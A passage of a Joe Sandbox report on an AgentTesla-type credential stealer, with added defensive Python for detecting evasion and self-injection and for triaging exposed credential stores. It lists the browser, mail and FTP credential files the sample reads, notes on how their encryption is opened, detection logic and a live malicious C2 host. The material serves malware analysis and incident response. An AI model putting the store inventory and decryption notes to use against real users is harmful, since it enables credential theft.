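The evasion and injection events in the two sections above are best correlated rather than alerted on one at a time. The Python below is an added example (it is not part of the Joe Sandbox report or of the sample) that takes constructed event records modelled on the report's lines, flags the combination of VM-revealing WMI enumeration with multi-minute thread delays, and pairs a suspended child that has the parent's own image path with a later write of an "MZ" header (4D5A) into that child, which is the self-hollowing chain shown above. PIDs 3364 and 4320 appear in the report; which is the parent, and the benign contrast process, are assumptions of the example. One caveat a .NET analyst will recognise: the "memory write watch" allocations are what the CLR garbage collector does for its heap in every managed process, so the example records them but gives them no weight.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

SAMPLE = r"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe"

# WMI classes whose instances carry hypervisor vendor strings (board, CPU,
# NIC); the first three are the ones the report shows being enumerated.
VM_PROBE_CLASSES = {"Win32_BaseBoard", "Win32_Processor",
                    "Win32_NetworkAdapterConfiguration",
                    "Win32_NetworkAdapter", "Win32_Bios", "Win32_ComputerSystem"}
LONG_DELAY_MS = 5 * 60 * 1000   # longer than a typical sandbox run

_WMI_CLASS = re.compile(
    r"root\\cimv2\s*:\s*(?:SELECT\s.+?\sFROM\s+)?(Win32_\w+)", re.IGNORECASE)
_DELAY_MS = re.compile(r"delay time:\s*(\d+)")


@dataclass
class Event:
    """One behaviour record; field names mirror the report's vocabulary."""
    pid: int
    image: str
    kind: str                      # "WMI Queries", "Thread delayed", ...
    detail: str = ""
    target_pid: Optional[int] = None
    target_image: Optional[str] = None
    base: Optional[int] = None
    data: bytes = b""
    suspended: bool = False


def wmi_class(detail: str) -> Optional[str]:
    m = _WMI_CLASS.search(detail)
    return m.group(1) if m else None


def delay_ms(detail: str) -> int:
    m = _DELAY_MS.search(detail)
    return int(m.group(1)) if m else 0


def score_sandbox_evasion(events: List[Event], pid: int) -> dict:
    probed, long_delays, write_watch = set(), 0, 0
    for e in events:
        if e.pid != pid:
            continue
        if e.kind == "WMI Queries":
            cls = wmi_class(e.detail)
            if cls in VM_PROBE_CLASSES:
                probed.add(cls)
        elif e.kind == "Thread delayed" and delay_ms(e.detail) >= LONG_DELAY_MS:
            long_delays += 1
        elif e.kind == "Memory allocated" and "write watch" in e.detail:
            # Recorded but not scored: the CLR garbage collector reserves its
            # heap with MEM_WRITE_WATCH, so every .NET process produces these.
            write_watch += 1
    return {"probed": sorted(probed), "long_delays": long_delays,
            "write_watch_allocs": write_watch,
            "suspicious": len(probed) >= 2 and long_delays >= 1}


def find_self_injection(events: List[Event]) -> List[dict]:
    """Suspended child with the parent's own image path, followed by the parent
    writing a PE header ("MZ" == 4D5A) into it: the report's hollowing pattern."""
    suspended_children = {}        # child pid -> parent pid
    hits = []
    for e in events:
        if (e.kind == "Process created" and e.suspended and e.target_image
                and e.target_image.lower() == e.image.lower()):
            suspended_children[e.target_pid] = e.pid
        elif (e.kind == "Memory written"
              and suspended_children.get(e.target_pid) == e.pid
              and e.data[:2] == b"MZ"):
            hits.append({"parent": e.pid, "child": e.target_pid, "base": e.base})
    return hits


# Constructed records modelled on the report's lines. PIDs 3364/4320 appear in
# the report; which one is the parent is an assumption made here.
SAMPLE_EVENTS = [
    Event(3364, SAMPLE, "Memory allocated", "1330000 memory reserve | memory write watch"),
    Event(3364, SAMPLE, "WMI Queries",
          r"IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration"),
    Event(3364, SAMPLE, "Thread delayed", "delay time: 922337203685477"),
    Event(3364, SAMPLE, "WMI Queries", r"IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard"),
    Event(3364, SAMPLE, "WMI Queries", r"IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor"),
    Event(3364, SAMPLE, "Process created", f'"{SAMPLE}"',
          target_pid=4320, target_image=SAMPLE, suspended=True),
    Event(3364, SAMPLE, "Memory written", "base: 400000 value starts with: 4D5A",
          target_pid=4320, base=0x400000, data=bytes.fromhex("4D5A9000")),
    # Benign contrast (hypothetical .NET tool): write-watch allocation only.
    Event(5000, r"C:\Program Files\Contoso\Tool.exe", "Memory allocated",
          "2A10000 memory reserve | memory write watch"),
]

if __name__ == "__main__":
    print(score_sandbox_evasion(SAMPLE_EVENTS, 3364))
    print(score_sandbox_evasion(SAMPLE_EVENTS, 5000))
    print(find_self_injection(SAMPLE_EVENTS))
```

The two detectors deliberately use different evidence: the evasion score needs at least two distinct VM-revealing classes plus one long delay, because a single Win32_Processor query is routine for inventory software, whereas one suspended same-image child plus one MZ write is already specific enough to report on its own.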

                    Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3285205060.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3285205060.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe PID: 3364, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe PID: 4320, type: MEMORYSTR
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (2 entries)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3285205060.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe PID: 3364, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe PID: 4320, type: MEMORYSTR
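The file and registry accesses listed above are the inventory of credential stores this stealer family reads. The Python below is an added example (not part of the report or of the sample) written for the responder's side of that list: given a user profile directory it reports which of the stores opened above exist, resolves the Mozilla profiles.ini (the reason Firefox and Thunderbird show up as that file rather than as logins.json) to the profile directories that hold logins.json and key4.db, and summarises how each Chromium "Login Data" entry is protected without decrypting anything. It runs against constructed sample files in a temporary directory; the store labels, the fixture contents and the example.test origins are assumptions of the example, while the file names and directories are the ones the report shows being opened.

```python
import configparser
import sqlite3
import tempfile
from pathlib import Path
from typing import List

# Stores opened by the sample, rooted at the user's profile directory and
# written with forward slashes so the example runs on any platform.
STORES = {
    "AppData/Local/Google/Chrome/User Data/Default/Login Data": "Chrome saved passwords",
    "AppData/Local/Microsoft/Edge/User Data/Default/Login Data": "Edge saved passwords",
    "AppData/Roaming/Mozilla/Firefox/profiles.ini": "Firefox profile index",
    "AppData/Roaming/Thunderbird/profiles.ini": "Thunderbird profile index",
}
# Version dword + provider GUID that opens every DPAPI blob.
DPAPI_MAGIC = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")


def mozilla_profile_dirs(profiles_ini: Path) -> List[Path]:
    """profiles.ini is the index a stealer reads first: each [ProfileN] section
    names a directory holding logins.json (ciphertext) and key4.db (its key)."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read(profiles_ini, encoding="utf-8")
    dirs = []
    for sect in cp.sections():
        if sect.startswith("Profile") and cp.has_option(sect, "Path"):
            p = Path(cp.get(sect, "Path"))
            if cp.get(sect, "IsRelative", fallback="1") == "1":
                p = profiles_ini.parent / p
            dirs.append(p)
    return dirs


def chromium_login_summary(login_data: Path) -> dict:
    """Count rows in the 'logins' table and classify each password_value blob.
    'v10' prefix: AES-256-GCM under the key kept DPAPI-wrapped in 'Local State'
    (Chrome 80+). DPAPI header: a raw DPAPI blob from older profiles. Both are
    decryptable by code running as the user, which is the stealer's position."""
    con = sqlite3.connect(str(login_data))
    try:
        rows = con.execute(
            "SELECT origin_url, username_value, password_value FROM logins").fetchall()
    finally:
        con.close()
    out = {"entries": len(rows), "aes_gcm_v10": 0, "dpapi": 0, "unknown": 0, "origins": []}
    for origin, _user, blob in rows:
        out["origins"].append(origin)
        blob = bytes(blob)
        if blob.startswith(b"v10"):
            out["aes_gcm_v10"] += 1
        elif blob.startswith(DPAPI_MAGIC):
            out["dpapi"] += 1
        else:
            out["unknown"] += 1
    return out


def triage(profile_root: Path) -> dict:
    """Which stores existed (and so were readable to the sample) and what they held."""
    result = {"present": {}, "logins": {}, "profiles": {}}
    for rel, label in STORES.items():
        p = profile_root / rel
        result["present"][label] = p.exists()
        if not p.exists():
            continue
        if p.name == "Login Data":
            result["logins"][label] = chromium_login_summary(p)
        elif p.name == "profiles.ini":
            result["profiles"][label] = [str(d) for d in mozilla_profile_dirs(p)]
    return result


def build_fixture(profile_root: Path) -> None:
    """Constructed sample data, not taken from any real host or from the report."""
    ld = profile_root / "AppData/Local/Google/Chrome/User Data/Default/Login Data"
    ld.parent.mkdir(parents=True, exist_ok=True)
    con = sqlite3.connect(str(ld))
    con.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)")
    con.executemany("INSERT INTO logins VALUES (?, ?, ?)", [
        ("https://mail.example.test/", "alice", b"v10" + bytes(12) + bytes(32)),  # nonce + ct/tag
        ("https://legacy.example.test/", "bob", DPAPI_MAGIC + bytes(40)),
    ])
    con.commit()
    con.close()
    ini = profile_root / "AppData/Roaming/Mozilla/Firefox/profiles.ini"
    ini.parent.mkdir(parents=True, exist_ok=True)
    ini.write_text("[General]\nStartWithLastProfile=1\n\n"
                   "[Profile0]\nName=default-release\nIsRelative=1\n"
                   "Path=Profiles/abcd1234.default-release\n\n"
                   "[Profile1]\nName=work\nIsRelative=0\nPath=/mnt/ffprofiles/work\n",
                   encoding="utf-8")


def run_demo() -> dict:
    root = Path(tempfile.mkdtemp(prefix="cred-triage-"))
    build_fixture(root)
    return triage(root)


if __name__ == "__main__":
    import json
    print(json.dumps(run_demo(), indent=2))
```

The practical reading of the result: every store that was present at infection time should be treated as disclosed, because each protection scheme listed here (DPAPI, the Local State key, and Mozilla's key4.db when no primary password is set) is designed to be opened by code running in the user's own session, which is exactly where this sample ran. The same holds for the WinSCP session keys and mail profiles under HKEY_CURRENT_USER listed above. On a live Windows host, copy the browser databases before reading them, since the browser holds them locked.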

                    Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3285205060.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3285205060.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe PID: 3364, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe PID: 4320, type: MEMORYSTR
MITRE ATT&CK Matrix (the report's grid, rewritten one line per tactic; a number in front of a technique is the report's detection-count badge for that technique, copied as extracted; techniques without a number are the grid's unmatched cells)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 121 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 141 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading
Credential Access: 2 OS Credential Dumping; 1 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 111 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 24 System Information Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Email Collection; 1 Input Capture; 11 Archive Collected Data; 2 Data from Local System; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: 1 Exfiltration Over Alternative Protocol; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

Source | Detection | Scanner | Label
SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | 36% | Virustotal |
SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | 50% | ReversingLabs | ByteCode-MSIL.Packed.Generic
SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | 100% | Avira | HEUR/AGEN.1309856
SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe | 100% | Joe Sandbox ML |
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label
https://account.dyn.com/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://ftp.wapination.net | 0% | Avira URL Cloud | safe
http://wapination.net | 0% | Avira URL Cloud | safe
Note: "safe" here is only the URL scanners' list lookup; the domain and IP tables below mark the same host malicious (active, AS46606), and the context table ties its IP to other AgentTesla samples.
Name | IP | Active | Malicious | Antivirus Detection | Reputation
wapination.net | 108.179.234.136 | true | true | (none) | unknown
ftp.wapination.net | unknown | unknown | true | (none) | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://ftp.wapination.net | SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3285205060.000000000330C000.00000004.00000800.00020000.00000000.sdmp; SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3285205060.00000000032FE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://account.dyn.com/ | SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmp; SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000000.00000002.2051097586.0000000003011000.00000004.00000800.00020000.00000000.sdmp; SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3285205060.00000000032FE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://wapination.net | SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3285205060.000000000330C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
108.179.234.136 | wapination.net | United States | 46606 | UNIFIEDLAYER-AS-1 (US) | true
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1460072
                        Start date and time:2024-06-20 14:22:11 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 36s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@3/1@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 132
                        • Number of non-executed functions: 6
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
08:23:05 | API Interceptor | 6x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
108.179.234.136 | SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe | malicious | AgentTesla
108.179.234.136 | Shipping Documents_pdf.scr.exe | malicious | AgentTesla
108.179.234.136 | Quotation_#432768#_pdf.scr.exe | malicious | AgentTesla, PureLog Stealer
108.179.234.136 | Payment Advice Copy-EUR 5500,00 20240419165413-docx.pif.exe | malicious | AgentTesla, PureLog Stealer
108.179.234.136 | Payment_Advice-pdf.exe | malicious | AgentTesla, PureLog Stealer, RedLine
Match | Associated Sample Name / URL | Detection | Threat Name | Context IP
UNIFIEDLAYER-AS-1 (US) | KMtvig5fAT.elf | malicious | Mirai | 173.83.210.166
UNIFIEDLAYER-AS-1 (US) | QUOTATION PT INDONESIA.pdf.exe | malicious | AgentTesla | 192.185.143.105
UNIFIEDLAYER-AS-1 (US) | SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe | malicious | AgentTesla | 108.179.234.136
UNIFIEDLAYER-AS-1 (US) | https://otn.yfm.mybluehost.me/DEGER/ | malicious | HTMLPhisher | 50.87.228.40
UNIFIEDLAYER-AS-1 (US) | http://click.promote.weebly.com/ls/click?upn=u001.j4J8mTsZ9n-2BXC3bkpEGuz50lGHlGvT3cLvbLRz27U7nbCy34PZfKldvZdQOxbYfQdpIO_ubnWW9PtOQz4ZIQW6byamRrJvV5j5QxMrQNeuvOlUwUwzU3n7afK0DT02-2Fh-2FEn9XQfE8APy5dcMY7okiMp6dn50YqTbWhwGv3QOuBDJ8By3TyASAIn3f2BeroENda7C-2Bh-2FrggWUDbq1OQU0iatMdz9T8bavQMqv-2FLL82Npkt-2FIYVNbpHq9Lcjy0FdNvuGsRZBL7ecWgydm46XJJa1wVRMTOXteK65K54Kr77vFfheTxVJYv2E8w-2B-2B1PVXj-2BtfuBn6giqM-2BrM-2FU61gbtNM1DlWLB5XHsVf7zrgHgzoU6kXBL4eU-2BkyxXXRasTbCCo1dj-2BUUHPOVM-2Fwx5w21DPnZBOlPgxyxHi4jDX1qhrEQ78CzgyGNwQZdsmAxFRaEEiJyZyTtySZibbaRCzWjvrWyDXH5YKeHfRMiRfJza-2BT3dvDBMLJnd2JeDwihpfsRj-2BRpKPerWH9cGrZtMGU7RwaTFiYJCYZjFzK8gYF3W6VV-2FJIhQ-3D#2298789727398466500609:53:58%20PM06/18/2024%2009:53:58%20PM9fjkqicho4gezabpl2us1nvy0tx58m3w | malicious | HTMLPhisher | 50.87.228.40
UNIFIEDLAYER-AS-1 (US) | Transaction Notification.exe | malicious | AgentTesla | 173.254.28.210
UNIFIEDLAYER-AS-1 (US) | Arrival Notice.bat.exe | malicious | FormBook | 162.241.253.174
UNIFIEDLAYER-AS-1 (US) | https://imoveisjsguimaraes.com.br/73/#akern@jerrypair.com | malicious | Unknown | 192.185.211.87
UNIFIEDLAYER-AS-1 (US) | shipping_doc.bat.exe | malicious | FormBook | 108.179.193.98
UNIFIEDLAYER-AS-1 (US) | https://luxsci-email.com/_LjLMz6YfdF3SADayiSEZ_/email-link/168507/2153/send-me?to=https://service.ringcentral.com@aerosupportfbo.com/access/auth/eups/cGVnZ3kud2VnbmVyQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ== | malicious | Unknown | 50.87.153.94
                                  No context
                                  No context
Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1301
Entropy (8bit): 5.334025345208678
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84VE4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hv
MD5: DD73DEAF52D7B54E1FD77901C5004AE1
SHA1: AD84320DFF21A9F0CD701FAD17A6DAF9CA27C8BD
SHA-256: D380E8D10429989836AC76845B952EF0047FAC85A7B077E2214182B0CA850DDC
SHA-512: CC2FBC32A17DB1DB18D9AD2795341C1150E1D6A14366D8F3E258717F93B4E1DD9023D52324315449885723FC7C180DFE62E29E88244EBD446AF2F705F474B49F
Malicious: true
Reputation: low
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Note: the content (numbered rows of assembly display names and native-image paths, starting with 1,"fusion","GAC",0) is the assembly usage log that the .NET Framework 4.x runtime writes for any managed application it starts. The file is marked malicious only because the process that wrote it is; it is not a payload and is of no use as an indicator on its own.
                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):7.929377700995905
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  File name:SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe
                                  File size:644'096 bytes
                                  MD5:b3db9023fe215f9cc7ea9dc71387f111
                                  SHA1:a46281d24cb8b7101a3307d10d81ac93a3e3abc4
                                  SHA256:e67fccc9c4055f580dd361b3224a292ad2eb2b4f625b123a4f36872564c8c81b
                                  SHA512:b1b43fcca10d472dc7654335f029c02c20b83a08c3d9e9ca0ea40a5679544ded999e6d419dd9d39e04391e84f51675bb968b12ac8ddadbd62eec611cc0f99c31
                                  SSDEEP:12288:K7rRWIaMoZoOs7KfPAymEPYToMvI+CnD5TfVLrz/nr0ZMcit17MTQ:dP9AytwfwznD9VrrDcifQ8
                                  TLSH:4DD412C0B869FF81C97F43B554B340181BB6A55F2637E26B1F9530C92C22BC68A68F53
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....sf................................. ........@.. .......................@............@................................
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0x49e9de
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x66739ED9 [Thu Jun 20 03:15:37 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                   Instruction
                                   jmp dword ptr [00402000h]
                                   (the remaining dumped bytes are zero padding, which the disassembler renders as 97 repetitions of "add byte ptr [eax], al")
